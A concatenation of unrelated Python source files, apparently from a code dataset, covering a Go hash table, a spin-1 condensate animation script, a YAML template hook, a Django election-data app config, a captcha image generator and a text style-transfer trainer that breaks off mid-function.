(Point(row=15, col=8), Player.black): 3370871771055988106,
(Point(row=15, col=8), Player.white): 6205297688850580126,
(Point(row=15, col=9), Player.black): 2729132856797520113,
(Point(row=15, col=9), Player.white): 1872963579855844925,
(Point(row=15, col=10), Player.black): 4796469616123085704,
(Point(row=15, col=10), Player.white): 2737956312985495735,
(Point(row=15, col=11), Player.black): 7425165379650361569,
(Point(row=15, col=11), Player.white): 4744913956310027049,
(Point(row=15, col=12), Player.black): 4432452777664043550,
(Point(row=15, col=12), Player.white): 7149390510594997576,
(Point(row=15, col=13), Player.black): 1127377434164446909,
(Point(row=15, col=13), Player.white): 7139372936332834674,
(Point(row=15, col=14), Player.black): 8623185287159014896,
(Point(row=15, col=14), Player.white): 2749311309393092071,
(Point(row=15, col=15), Player.black): 3889399041204032560,
(Point(row=15, col=15), Player.white): 5440568414932730887,
(Point(row=15, col=16), Player.black): 7961130044126580240,
(Point(row=15, col=16), Player.white): 5522153684761811918,
(Point(row=15, col=17), Player.black): 1051894275733779402,
(Point(row=15, col=17), Player.white): 7775123139195000322,
(Point(row=15, col=18), Player.black): 405047372528169449,
(Point(row=15, col=18), Player.white): 6777693792695027781,
(Point(row=15, col=19), Player.black): 2707900765333949110,
(Point(row=15, col=19), Player.white): 1748580443724313214,
(Point(row=16, col=1), Player.black): 2310585590428078863,
(Point(row=16, col=1), Player.white): 4217038584119906912,
(Point(row=16, col=2), Player.black): 985202624705196243,
(Point(row=16, col=2), Player.white): 9151409094950142193,
(Point(row=16, col=3), Player.black): 750140955532969349,
(Point(row=16, col=3), Player.white): 2226854903279338690,
(Point(row=16, col=4), Player.black): 1753443221335135301,
(Point(row=16, col=4), Player.white): 112641559000638460,
(Point(row=16, col=5), Player.black): 2469310201348258380,
(Point(row=16, col=5), Player.white): 2933066886110832647,
(Point(row=16, col=6), Player.black): 8760290595356794758,
(Point(row=16, col=6), Player.white): 3938325596318156201,
(Point(row=16, col=7), Player.black): 351392362800699236,
(Point(row=16, col=7), Player.white): 5965923125256290133,
(Point(row=16, col=8), Player.black): 4226241391525466462,
(Point(row=16, col=8), Player.white): 2296189491115798113,
(Point(row=16, col=9), Player.black): 5818906966146137497,
(Point(row=16, col=9), Player.white): 2978814809930535951,
(Point(row=16, col=10), Player.black): 5221313999467075534,
(Point(row=16, col=10), Player.white): 5525586090026314079,
(Point(row=16, col=11), Player.black): 7150888125699917692,
(Point(row=16, col=11), Player.white): 7967098806646820797,
(Point(row=16, col=12), Player.black): 2809819457402689956,
(Point(row=16, col=12), Player.white): 7425517738724027933,
(Point(row=16, col=13), Player.black): 9043041476972987773,
(Point(row=16, col=13), Player.white): 4126568890528841830,
(Point(row=16, col=14), Player.black): 405195601380630992,
(Point(row=16, col=14), Player.white): 2859364994541233088,
(Point(row=16, col=15), Player.black): 9100706054278752322,
(Point(row=16, col=15), Player.white): 2698432353369862483,
(Point(row=16, col=16), Player.black): 233570791189122902,
(Point(row=16, col=16), Player.white): 1955797661194269678,
(Point(row=16, col=17), Player.black): 3215444208293145815,
(Point(row=16, col=17), Player.white): 7749899566907810501,
(Point(row=16, col=18), Player.black): 4434257155996611207,
(Point(row=16, col=18), Player.white): 5524138211073814901,
(Point(row=16, col=19), Player.black): 3879442844657515242,
(Point(row=16, col=19), Player.white): 4095000128396542164,
(Point(row=17, col=1), Player.black): 3117304355126357036,
(Point(row=17, col=1), Player.white): 8288379997552988803,
(Point(row=17, col=2), Player.black): 5322299816902250572,
(Point(row=17, col=2), Player.white): 7955260886908761297,
(Point(row=17, col=3), Player.black): 7425435021255007715,
(Point(row=17, col=3), Player.white): 3941956462330213296,
(Point(row=17, col=4), Player.black): 1667932789968984978,
(Point(row=17, col=4), Player.white): 7761984596295380582,
(Point(row=17, col=5), Player.black): 2614708018742137051,
(Point(row=17, col=5), Player.white): 5622728983365429270,
(Point(row=17, col=6), Player.black): 3166135214757456351,
(Point(row=17, col=6), Player.white): 1820234063889877538,
(Point(row=17, col=7), Player.black): 7600848454149943870,
(Point(row=17, col=7), Player.white): 2753551240055896921,
(Point(row=17, col=8), Player.black): 1106934710738997852,
(Point(row=17, col=8), Player.white): 4526974971888515393,
(Point(row=17, col=9), Player.black): 6549127170110706395,
(Point(row=17, col=9), Player.white): 5670307432083885437,
(Point(row=17, col=10), Player.black): 7309255636469744981,
(Point(row=17, col=10), Player.white): 4822125742706822460,
(Point(row=17, col=11), Player.black): 7220686973131194088,
(Point(row=17, col=11), Player.white): 3764391926682480440,
(Point(row=17, col=12), Player.black): 2913903513213258547,
(Point(row=17, col=12), Player.white): 6507070047539847251,
(Point(row=17, col=13), Player.black): 7872528269466684417,
(Point(row=17, col=13), Player.white): 4192693152170512736,
(Point(row=17, col=14), Player.black): 4559365332905827812,
(Point(row=17, col=14), Player.white): 3554627099004559818,
(Point(row=17, col=15), Player.black): 2545070106672825097,
(Point(row=17, col=15), Player.white): 401721397973562050,
(Point(row=17, col=16), Player.black): 1915725896509292407,
(Point(row=17, col=16), Player.white): 9157259484226467403,
(Point(row=17, col=17), Player.black): 8198919660148798022,
(Point(row=17, col=17), Player.white): 6675520034574308988,
(Point(row=17, col=18), Player.black): 5572663870847872100,
(Point(row=17, col=18), Player.white): 6316773736280904464,
(Point(row=17, col=19), Player.black): 4388687526018013997,
(Point(row=17, col=19), Player.white): 3586033991605775080,
(Point(row=18, col=1), Player.black): 4613449893232649289,
(Point(row=18, col=1), Player.white): 3861903736492753207,
(Point(row=18, col=2), Player.black): 3202758646651797984,
(Point(row=18, col=2), Player.white): 4133094515312691565,
(Point(row=18, col=3), Player.black): 5426472657376008387,
(Point(row=18, col=3), Player.white): 655369761575316671,
(Point(row=18, col=4), Player.black): 2077728647251025218,
(Point(row=18, col=4), Player.white): 6123792056065592311,
(Point(row=18, col=5), Player.black): 8817000461345714312,
(Point(row=18, col=5), Player.white): 7398451604017428982,
(Point(row=18, col=6), Player.black): 4740990483507680922,
(Point(row=18, col=6), Player.white): 226766346004950653,
(Point(row=18, col=7), Player.black): 4297852790462069905,
(Point(row=18, col=7), Player.white): 2197353642346969827,
(Point(row=18, col=8), Player.black): 3629856433750791325,
(Point(row=18, col=8), Player.white): 8608402781860824733,
(Point(row=18, col=9), Player.black): 7679472870378645470,
(Point(row=18, col=9), Player.white): 3129117740892945656,
(Point(row=18, col=10), Player.black): 6022746329655441342,
(Point(row=18, col=10), Player.white): 6053662240788938043,
(Point(row=18, col=11), Player.black): 5612608898331419920,
(Point(row=18, col=11), Player.white): 8095509113662719358,
(Point(row=18, col=12), Player.black): 7366806444887424607,
(Point(row=18, col=12), Player.white): 8722702568187767742,
(Point(row=18, col=13), Player.black): 7576913276828070602,
(Point(row=18, col=13), Player.white): 975355406767794881,
(Point(row=18, col=14), Player.black): 4558952012254833057,
(Point(row=18, col=14), Player.white): 7453093514862056338,
(Point(row=18, col=15), Player.black): 2603655647783102532,
(Point(row=18, col=15), Player.white): 8360947937606696580,
(Point(row=18, col=16), Player.black): 2380048416754120672,
(Point(row=18, col=16), Player.white): 6190351435507898305,
(Point(row=18, col=17), Player.black): 4230604829929423542,
(Point(row=18, col=17), Player.white): 3855327000552344147,
(Point(row=18, col=18), Player.black): 333673637459411756,
(Point(row=18, col=18), Player.white): 2465187608717265538,
(Point(row=18, col=19), Player.black): 6268429878451399082,
(Point(row=18, col=19), Player.white): 6548297594224631467,
(Point(row=19, col=1), Player.black): 4847546886605869626,
(Point(row=19, col=1), Player.white): 1467219893557249016,
(Point(row=19, col=2), Player.black): 8265836827786570713,
(Point(row=19, col=2), Player.white): 1310557064505780387,
(Point(row=19, col=3), Player.black): 4261541966886236370,
(Point(row=19, col=3), Player.white): 4303938384049567829,
(Point(row=19, col=4), Player.black): 5951641827131677319,
(Point(row=19, col=4), Player.white): 4042199037642727955,
(Point(row=19, col=5), Player.black): 207646346159424554,
(Point(row=19, col=5), Player.white): 4135202834450329273,
(Point(row=19, col=6), Player.black): 382133973552173016,
(Point(row=19, col=6), Player.white): 3559829303112288905,
(Point(row=19, col=7), Player.black): 2266136181192524665,
(Point(row=19, col=7), Player.white): 3817237075629846954,
(Point(row=19, col=8), Player.black): 2610525566275870438,
(Point(row=19, col=8), Player.white): 1273827977819700249,
(Point(row=19, col=9), Player.black): 26273397228875002,
(Point(row=19, col=9), Player.white): 7375330758892600621,
(Point(row=19, col=10), Player.black): 8752487231531749057,
(Point(row=19, col=10), Player.white): 8126550380346161414,
(Point(row=19, col=11), Player.black): 5618797351671764015,
(Point(row=19, col=11), Player.white): 5040907570519819462,
(Point(row=19, col=12), Player.black): 9120690258999923218,
(Point(row=19, col=12), Player.white): 7747977604704742878,
(Point(row=19, col=13), Player.black): 8175024806705415540,
(Point(row=19, col=13), Player.white): 6029597491063011802,
(Point(row=19, col=14), Player.black): 2042107275912665033,
(Point(row=19, col=14), Player.white): 5791689611226912136,
(Point(row=19, col=15), Player.black): 1062710851838635153,
(Point(row=19, col=15), Player.white): 4149047099440364178,
(Point(row=19, col=16), Player.black): 897650112570198107,
(Point(row=19, col=16), Player.white): 2430368125342031745,
(Point(row=19, col=17), Player.black): 6124238047959944916,
(Point(row=19, col=17), Player.white): 8173927967552829761,
(Point(row=19, col=18), Player.black): 5747036537194470761,
(Point(row=19, col=18), Player.white): 3102757242878139008,
(Point(row=19, col=19), Player.black): 766659392679871184,
(Point(row=19, col=19), Player.white): 7268838751129184476,
}
EMPTY_BOARD = 0 | 45,542 | 28,156 |
import h5py
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
# Load in data:
filename = input('Enter data filename: ')
data_file = h5py.File('../../data/{}.hdf5'.format(filename), 'r')
psi_plus = data_file['wavefunction/psi_plus']
psi_0 = data_file['wavefunction/psi_0']
psi_minus = data_file['wavefunction/psi_minus']
# Other variables:
x, y = data_file['grid/x'], data_file['grid/y']
dx, dy = x[1] - x[0], y[1] - y[0]
X, Y = np.meshgrid(x[:], y[:])
# Loading time variables:
Nt, dt, Nframe = np.array(data_file['time/Nt']), np.array(data_file['time/dt']), np.array(data_file['time/Nframe'])
num_of_frames = psi_plus.shape[-1]
# Calculate initial spin expectation:
dens = abs(psi_plus[:, :, 0]) ** 2 + abs(psi_0[:, :, 0]) ** 2 + abs(psi_minus[:, :, 0]) ** 2
F_perp = np.sqrt(2) * (np.conj(psi_plus[:, :, 0]) * psi_0[:, :, 0] + np.conj(psi_0[:, :, 0]) * psi_minus[:, :, 0])
Fz = abs(psi_plus[:, :, 0]) ** 2 - abs(psi_minus[:, :, 0]) ** 2
spin_expec_mag = np.sqrt(Fz ** 2 + abs(F_perp) ** 2) / dens
# Set up figure:
fig, ax = plt.subplots(1, 3, sharey=True, figsize=(10, 10))
ax[0].set_ylabel(r'$y / \xi_s$')
ax[0].set_title(r'$|\psi_+|^2$')
ax[1].set_title(r'$|\psi_-|^2$')
ax[2].set_title(r'$|<\vec{F}>|$')
for axis in ax:
axis.set_xlabel(r'$x / \xi_s$')
cvals_dens = np.linspace(0, 1, 25, endpoint=True)
cvals_spin = np.linspace(0, 1, 25, endpoint=True)
# Initial frame plot:
densPlus_plot = ax[0].contourf(X, Y, abs(psi_plus[:, :, 0]) ** 2, cvals_dens, cmap='gnuplot')
densMinus_plot = ax[1].contourf(X, Y, abs(psi_minus[:, :, 0]) ** 2, cvals_dens, cmap='gnuplot')
spin_plot = ax[2].contourf(X, Y, spin_expec_mag, cvals_spin, cmap='PuRd')
cont = [densPlus_plot, densMinus_plot, spin_plot]
# Set up color bars:
dens_cbar = plt.colorbar(densMinus_plot, ax=ax[1], fraction=0.044, pad=0.03)
phase_cbar = plt.colorbar(spin_plot, ax=ax[2], ticks=[0, 1], fraction=0.044, pad=0.03)
for axis in ax:
axis.set_aspect('equal')
plt.text(-100, 400, r'$n_0 = 1, c_0 = 3.5, c_2 = 0.5$')
def animate(i):
"""Animation function for plots."""
global cont
for contour in cont:
for c in contour.collections:
c.remove()
ax[0].contourf(X, Y, abs(psi_plus[:, :, i]) ** 2, cvals_dens, cmap='gnuplot')
ax[1].contourf(X, Y, abs(psi_minus[:, :, i]) ** 2, cvals_dens, cmap='gnuplot')
# Calculate spin expectation:
dens = abs(psi_plus[:, :, i]) ** 2 + abs(psi_0[:, :, i]) ** 2 + abs(psi_minus[:, :, i]) ** 2
F_perp = np.sqrt(2) * (np.conj(psi_plus[:, :, i]) * psi_0[:, :, i] + np.conj(psi_0[:, :, i]) * psi_minus[:, :, i])
Fz = abs(psi_plus[:, :, i]) ** 2 - abs(psi_minus[:, :, i]) ** 2
spin_expec_mag = np.sqrt(Fz ** 2 + abs(F_perp) ** 2) / dens
ax[2].contourf(X, Y, spin_expec_mag, cvals_spin, cmap='PuRd')
cont = [ax[0], ax[1], ax[2]]
print('On density iteration %i' % (i + 1))
plt.suptitle(r'$\tau$ = %2f' % (Nframe * dt * i), y=0.7)
return cont
# Calls the animation function and saves the result
anim = animation.FuncAnimation(fig, animate, frames=num_of_frames, repeat=False)
anim.save('../../../plots/spin-1/{}.mp4'.format(filename[7:]), dpi=200,
writer=animation.FFMpegWriter(fps=60, codec="libx264", extra_args=['-pix_fmt', 'yuv420p']))
print('Density video saved successfully.')
| 3,321 | 1,502 |
import attr
import yaml
from boltun.engine import Engine
@attr.s
class YamlProcessor(object):
engine = attr.ib(default=attr.Factory(Engine))
def __enable__(self, tag="!boltun", resolver=False):
yaml.add_constructor(tag, self)
if resolver:
yaml.add_implicit_resolver(tag, self._match)
def __call__(self, loader, node, **kwargs):
return self.engine.render(node.value)
def _match(self, input_):
try:
template = self.engine.create_template(input_)
except Exception:
return False
return True if template else False
| 618 | 186 |
from abstract.apps import AbstractConfig
from .loader import CVK2015Loader
from .elastic_models import ElasticCVK2015Model, cvk_2015_idx
class CVK2015Config(AbstractConfig):
name = "cvk_2015"
verbose_name = "Учасники місцевих виборів 2015-го року"
short_name = "Регіони"
loader_class = CVK2015Loader
@property
def data_model(self):
# Doing that to prevent circular imports of some kind
from .models import CVK2015Model
return CVK2015Model
@property
def sitemap(self):
from .sitemaps import CVK2015Sitemap
return CVK2015Sitemap
elastic_model = ElasticCVK2015Model
elastic_index = cvk_2015_idx | 681 | 253 |
# -*- coding: UTF-8 -*-
"""
使用PIL lib生成验证码(前提:pip install PIL)
"""
from PIL import Image,ImageFont,ImageDraw,ImageFilter
import os
import random
import time
import json
def gen_special_img(text, file_path, width, height):
# 生成img文件
fontSize = 16
backGroundColor = (102,142,107)
fontColor = (112,66,60)
font = ImageFont.truetype('./simhei.ttf', fontSize)
img = Image.new('RGBA',(width,height), backGroundColor)
textWidth, textHeight = font.getsize(text)
textLeft = (width-textWidth)/2
textTop = (height-textHeight)/2-2
draw = ImageDraw.Draw(img)
draw.text(xy=(textLeft,textTop),text=text,fill=fontColor,font=font)
rot = img.rotate(0,expand=0)
img.rotate
fff = Image.new('RGBA', rot.size,backGroundColor)
img = Image.composite(rot, fff, rot)
img.save(file_path) # 保存图片
def gen_ima_by_batch(root_dir, image_suffix, characters, count, char_count, width, height):
# 判断文件夹是否存在
if not os.path.exists(root_dir):
os.makedirs(root_dir)
# for index, i in enumerate(range(count)):
# text = ""
# for j in range(char_count):
# text += random.choice(characters)
for index, i in enumerate(range(count)):
text = ""
add_al = chr(random.randrange(65, 91)) # chr转换为A-Z大写。print(chr(90))#65-90任意生成A-Z
for j in range(char_count):
text += random.choice(characters)
text = "".join([str(add_al),text])
timec = str(time.time()).replace(".", "")
p = os.path.join(root_dir, "{}_{}.{}".format(text, timec, image_suffix))
gen_special_img(text, p, width, height)
print("Generate captcha image => {}".format(index + 1))
def main():
with open("conf/captcha_config.json", "r") as f:
config = json.load(f)
# 配置参数
root_dir = config["root_dir"] # 图片储存路径
image_suffix = config["image_suffix"] # 图片储存后缀
characters = config["characters"] # 图片上显示的字符集 # characters = "0123456789abcdefghijklmnopqrstuvwxyz"
count = config["count"] # 生成多少张样本
char_count = config["char_count"] # 图片上的字符数量
# 设置图片高度和宽度
width = config["width"]
height = config["height"]
gen_ima_by_batch(root_dir, image_suffix, characters, count, char_count, width, height)
if __name__ == '__main__':
main()
| 2,296 | 929 |
import os
import time
import csv
import pickle
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data.dataloader import DataLoader
from torch.nn.utils import clip_grad_norm_ as clip_grad_norm
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
from utils import tokenization, optimization, constants, misc
from utils.data import *
from utils.evaluator import BLEUEvaluator
def get_transfer_data(data_dir, data_name):
"""
args:
data_dir: str
data_name: str
return:
data: dict of {"src_str": list of str, "lab": list of int}
"""
src_0, src_1 = [], []
with open(os.path.join(data_dir, data_name+".0"), 'r') as f:
for line in f.readlines():
src_0.append(line.strip())
with open(os.path.join(data_dir, data_name+".1"), 'r') as f:
for line in f.readlines():
src_1.append(line.strip())
lab_0 = [0] * len(src_0)
lab_1 = [1] * len(src_1)
src = src_0 + src_1
lab = lab_0 + lab_1
assert len(src) == len(lab)
data = {"src_str": src, "lab": lab}
print("%s data has been loaded" % data_name)
for l, count in enumerate(np.bincount(data["lab"])):
print("number of label %d: %d" % (l, count))
return data
def load_and_cache_data(args, data_name, tokenizer):
"""
return:
data: dict of {"src_str": list of str,
"src_ind": list of int,
"lab": list of int}
"""
sos_str = "_sos" if args.use_sos else ""
eos_str = "_eos" if args.use_eos else ""
mask_str = "_mask" if "mask" in args.vocab_file_name else ""
cached_data_file = os.path.join(
args.data_dir,
f"cached_transfer_{data_name}{sos_str}{eos_str}{mask_str}"
)
if os.path.exists(cached_data_file) and not args.overwrite_cache:
print("Loading data from cached data file %s" % cached_data_file)
data = torch.load(cached_data_file)
else:
print("Creating cached data file from data at %s" % cached_data_file)
data = get_transfer_data(args.data_dir, data_name)
index_src = []
str_src = []
sos_id, eos_id = tokenizer.SOS_ID, tokenizer.EOS_ID
sos_token, eos_token = tokenizer.SOS_TOKEN, tokenizer.EOS_TOKEN
if args.use_sos and args.use_eos:
for text in data['src_str']:
index_src.append([sos_id] + tokenizer.encode(text) + [eos_id])
str_src.append(' '.join([sos_token, text, eos_token]))
elif args.use_sos:
for text in data['src_str']:
index_src.append([sos_id] + tokenizer.encode(text))
str_src.append(' '.join([sos_token, text]))
elif args.use_eos:
for text in data['src_str']:
index_src.append(tokenizer.encode(text) + [eos_id])
str_src.append(' '.join([text, eos_token]))
else:
for text in data['src_str']:
index_src.append(tokenizer.encode(text))
str_src.append(text)
data['src_ind'] = index_src
data['src_str'] = str_src
torch.save(data, cached_data_file)
return data
def lambda_schedule(num_iter, start=0.0, stop=1.0, ratio=0.1):
lambdas = np.ones(num_iter) * stop
progress_interval = num_iter * ratio
for i in range(int(progress_interval)):
lambdas[i] *= i / progress_interval
return lambdas
class BasicTrainer:
"""
Basic Trainer
"""
def __init__(self, args, model, train_data=None, dev_data=None, test_data=None,
tokenizer=None):
self.args = args
self.model = model
self.optimizer = None
self.scheduler = None
self.train_dataloader = self.get_dataloader(train_data, "train")\
if train_data else None
self.dev_dataloader = self.get_dataloader(dev_data, "dev")\
if dev_data else None
self.test_dataloader = self.get_dataloader(test_data, "test")\
if test_data else None
if self.train_dataloader:
self.optimizer, self.scheduler = self.get_optimizer()
def get_dataloader(self, data, data_name):
args = self.args
if data_name == "train":
shuffle = args.shuffle
batch_size = args.batch_size
else:
shuffle = False
# batch_size = 2
batch_size = args.batch_size
dataset = ClassifierDataset(data["src_ind"], data["lab"])
dataloader = DataLoader(dataset=dataset,
batch_size=args.batch_size,
shuffle=shuffle,
num_workers=args.num_workers,
collate_fn=ClassifierPaddingCollate)
return dataloader
def get_optimizer(self):
args = self.args
model = self.model
train_dataloader = self.train_dataloader
optimizer = optimization.get_optim(args, model.parameters())
num_steps = len(train_dataloader) * args.num_train_epochs
args.num_steps = num_steps
print("Total number of steps: %d" % num_steps)
decay_step = len(train_dataloader) * args.decay_epoch
if args.decay_epoch > 0:
print("Step when lr starts to decay: %d" % decay_step)
scheduler = optimization.get_constant_schedule_with_linear_decay(
optimizer, decay_step=decay_step, num_training_steps=num_steps
)
else:
scheduler = optimization.get_constant_schedule(optimizer)
return optimizer, scheduler
def save_checkpoint(self, path):
# torch.save(self.args, os.path.join(path, "args.pt"))
torch.save(self.model.state_dict(), os.path.join(path, "model_state_dict.pt"))
# torch.save(self.optimizer.state_dict(), os.path.join(path, "optimizer_state_dict.pt"))
# torch.save(self.scheduler.state_dict(), os.path.join(path, "scheduler_state_dict.pt"))
return
def train(self):
raise NotImplementedError()
def evaluate(self):
raise NotImplementedError()
def test(self):
raise NotImplementedError()
def save_train_result(self, train_record, eval_record):
args = self.args
train_loss_record = train_record
eval_bleu_record, eval_gs_record = eval_record
best_bleu = np.max(eval_bleu_record)
step_of_best_bleu = eval_gs_record[np.argmax(eval_bleu_record)]
print("best BLEU: %.4f in step %d" % (best_bleu, step_of_best_bleu))
with open(os.path.join(args.output_dir, "training_result.log"), 'w') as f:
f.write("best BLEU: %.4f in step %d" % (best_bleu, step_of_best_bleu))
plt.figure()
plt.xlabel("step")
plt.ylabel("BLEU")
plt.plot(eval_gs_record, eval_bleu_record)
plt.tight_layout()
plt.savefig(os.path.join(args.output_dir, "bleu.pdf"), format='pdf') # bbox_inches='tight'
plt.figure()
plt.xlabel("step")
plt.ylabel("loss")
plt.plot(list(range(len(train_loss_record))), train_loss_record)
# plt.plot(eval_gs_record, eval_loss_record)
plt.tight_layout()
plt.savefig(os.path.join(args.output_dir, "loss.pdf"), format='pdf')
return best_bleu, step_of_best_bleu
class TransferModelTrainer(BasicTrainer):
def __init__(self, args, model, train_data=None, dev_data=None,
test_data=None, **kwargs):
super().__init__(
args, model, train_data, dev_data, test_data
)
self.tokenizer = kwargs["tokenizer"]
if self.args.cls_model_path:
print(f"Load classifier model form {self.args.cls_model_path}")
self.model.classifier.load_state_dict(
torch.load(
os.path.join(self.args.cls_model_path, "model_state_dict.pt")
)
)
self.model.freeze_cls()
# args.cls_weight = 0.05
# args.ca_weight = 0.0
# args.bt_weight = 1.0
self.use_caw_schedule = False
del self.optimizer
del self.scheduler
if self.train_dataloader:
params = []
for k, v in self.model.named_parameters():
# print("%s: %s" % (k, str(v.shape)))
if "classifier" in k or "lm" in k:
print("not optimize %s" % k)
else:
print("add params of %s to optimizer" % k)
params.append(v)
self.optimizer, self.scheduler\
= self.get_optimizer(params)
# torch.autograd.set_detect_anomaly(True)
self.clf_model = torch.load(args.cnn_clf_path).to(args.device)
self.clf_model.eval()
self.dev_ref_path_list = getattr(args, "dev_ref_path_list", None)
self.test_ref_path_list = getattr(args, "test_ref_path_list", None)
if self.test_ref_path_list is None:
self.test_ref_path_list = self.args.ref_list
print("self.dev_ref_path_list is")
print(self.dev_ref_path_list)
print("self.test_ref_path_list is")
print(self.test_ref_path_list)
if not self.args.use_bpe:
self.dev_data_path_list = [
[os.path.join(self.args.data_dir, f"dev.{i}")] for i in range(2)
]
self.test_data_path_list = [
[os.path.join(self.args.data_dir, f"test.{i}")] for i in range(2)
]
else:
self.dev_data_path_list = [
[os.path.join(self.args.data_dir, f"self_ref.dev.{i}")] for i in range(2)
]
self.test_data_path_list = [
[os.path.join(self.args.data_dir, f"self_ref.test.{i}")] for i in range(2)
]
print("self.dev_data_path_list is")
print(self.dev_data_path_list)
print("self.test_data_path_list is")
print(self.test_data_path_list)
def get_optimizer(self, params=None):
args = self.args
if params is None:
print("return because params is None")
return None, None
# params = self.model.parameters()
train_dataloader = self.train_dataloader
optimizer = optimization.get_optim(args, params)
num_steps = len(train_dataloader) * args.num_train_epochs // args.grad_accum_interval
args.num_steps = num_steps
print("Total number of steps: %d" % num_steps)
decay_step = len(train_dataloader) * args.decay_epoch
if args.decay_epoch > 0:
print("Step when lr starts to decay: %d" % decay_step)
scheduler = optimization.get_constant_schedule_with_linear_decay(
optimizer, decay_step=decay_step, num_training_steps=num_steps
)
else:
scheduler = optimization.get_constant_schedule(optimizer)
return optimizer, scheduler
def train(self, train_dataloader=None):
print("\n### TRAINING BEGINS ###")
args = self.args
model = self.model
optimizer = self.optimizer
scheduler = self.scheduler
train_dataloader = train_dataloader if train_dataloader else self.train_dataloader
model.train()
loss_record = [] # loss at global_step 0, 1, 2 ...
dev_metric_record = []
global_step_record_for_eval = []
global_step = 0
pad_id = args.pad_id
grad_accum_interval = args.grad_accum_interval
log_loss = 0.0
num_iters_per_epoch = len(train_dataloader)
normalizer = min(num_iters_per_epoch, grad_accum_interval)
cls_w = args.cls_weight
print("cls_w is", cls_w)
if self.use_caw_schedule:
start = 0.0
stop = args.ca_weight
ratio = 0.5
ca_w_list = lambda_schedule(args.num_steps,
start=start, stop=stop, ratio=ratio)
print(f"ca_w uses schedule (start={start}, stop={stop}, ratio={ratio})")
ca_w = ca_w_list[0]
else:
ca_w = args.ca_weight
print("ca_w is", ca_w)
bt_w = args.bt_weight
print("bt_w is", bt_w)
model.zero_grad()
if args.freeze_emb_at_beginning:
model.freeze_emb()
start_time = time.time()
for ep in range(args.num_train_epochs):
if ep == args.unfreeze_at_ep and args.freeze_emb_at_beginning:
model.unfreeze_emb()
for step, batch in enumerate(train_dataloader):
src, lab, src_len = batch
# print(f"ep:{ep}, step: {step}, src.shape[1] is", src.shape[1])
sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True)
sorted_src = torch.index_select(src, dim=0, index=indices)
sorted_lab = torch.index_select(lab, dim=0, index=indices)
sorted_src = sorted_src.to(args.device)
sorted_src_len = sorted_src_len.to(args.device)
sorted_lab = sorted_lab.to(args.device)
try:
sorted_src_pad_mask = sorted_src==pad_id
sorted_loss_tuple, sorted_output_tuple,\
sorted_algin = model(sorted_src, sorted_src_len,
sorted_lab, sorted_src_pad_mask)
sorted_rec_loss, sorted_bt_loss,\
sorted_src_cls_loss, sorted_soft_out_cls_loss,\
sorted_out_cls_loss, sorted_ca_loss = sorted_loss_tuple
sorted_output, sorted_output_len = sorted_output_tuple
rec_loss = sorted_rec_loss.mean()
bt_loss = sorted_bt_loss.mean()
src_cls_loss = sorted_src_cls_loss.mean()
soft_out_cls_loss = sorted_soft_out_cls_loss.mean()
out_cls_loss = sorted_out_cls_loss.mean()
ca_loss = sorted_ca_loss.mean()
loss = rec_loss + bt_w * bt_loss\
+ cls_w * soft_out_cls_loss + ca_w * ca_loss
loss /= normalizer
loss.backward()
if (step+1) % grad_accum_interval == 0 or\
(grad_accum_interval >= num_iters_per_epoch and
(step+1) == num_iters_per_epoch):
g = clip_grad_norm(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step()
model.zero_grad()
loss_record.append(log_loss)
# global_step += 1
log_loss = 0.0
if global_step > 0 and global_step % args.log_interval == 0:
print(
f"epoch: {ep} "\
f"step: {global_step} "\
f"loss: {loss.item() * normalizer:.4f} "\
f"rec_loss: {rec_loss.item():.4f} "\
f"bt_loss: {bt_loss.item():.4f} "\
f"src_cls_loss: {src_cls_loss.item():.4f} "\
f"soft_out_cls_loss: {soft_out_cls_loss.item():.4f} "\
f"out_cls_loss: {out_cls_loss.item():.4f} "\
f"ca_loss: {ca_loss.item():.4f} "\
f"||g||: {g:.2f} "\
f"ca_w: {ca_w:.4f} "\
f"time: {misc.timeBetween(start_time, time.time())}"
)
if global_step > 0 and global_step % args.eval_interval == 0:
print("\neval model at step: %d" % global_step)
checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step)
if not os.path.exists(checkpoint_output_dir):
os.mkdir(checkpoint_output_dir)
org_output_dir = args.output_dir
args.output_dir = checkpoint_output_dir
print("dev")
dev_metric = self.evaluate()
dev_metric_record.append(dev_metric)
global_step_record_for_eval.append(global_step)
args.output_dir = org_output_dir
print("Save checkpoint at %s" % checkpoint_output_dir)
self.save_checkpoint(checkpoint_output_dir)
model.train()
global_step += 1
if self.use_caw_schedule:
ca_w = ca_w_list[global_step]
else:
log_loss += loss.item()
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
raise e
# gpu_profile(frame=sys._getframe(), event='line', arg=None)
print("### TRAINING ENDS ###\n")
print("\neval model at step: %d" % global_step)
checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step)
if not os.path.exists(checkpoint_output_dir):
os.mkdir(checkpoint_output_dir)
org_output_dir = args.output_dir
args.output_dir = checkpoint_output_dir
print("dev")
dev_metric = self.evaluate()
dev_metric_record.append(dev_metric)
global_step_record_for_eval.append(global_step)
args.output_dir = org_output_dir
print("Save checkpoint at %s" % checkpoint_output_dir)
self.save_checkpoint(checkpoint_output_dir)
train_record = loss_record
eval_record = (dev_metric_record, global_step_record_for_eval)
with open(os.path.join(args.output_dir, "record.pt"), "wb") as f:
pickle.dump({"train": train_record, "eval": eval_record}, f)
self.save_train_result(train_record, eval_record)
return train_record, eval_record
def evaluate(self, eval_dataloader=None, data_path_list=None, ref_path_list=None, data_name="dev"):
eval_dataloader = eval_dataloader if eval_dataloader else self.dev_dataloader
ref_path_list = ref_path_list if ref_path_list else self.dev_ref_path_list
data_path_list = data_path_list if data_path_list else self.dev_data_path_list
args = self.args
model = self.model
tokenizer = self.tokenizer
clf_model = self.clf_model
model.eval()
num_data = 0
total_loss = 0
total_rec_loss = 0
total_bt_loss = 0
total_src_cls_loss = 0
total_soft_out_cls_loss = 0
total_out_cls_loss = 0
total_ca_loss = 0
outputs_list = []
outputs_len_list = []
lab_list = []
clf_preds_list = []
cls_w = args.cls_weight
ca_w = args.ca_weight
bt_w = args.bt_weight
pad_id = args.pad_id
start_time = time.time()
with torch.no_grad():
for step, batch in enumerate(eval_dataloader):
src, lab, src_len = batch
num_data += src.shape[0]
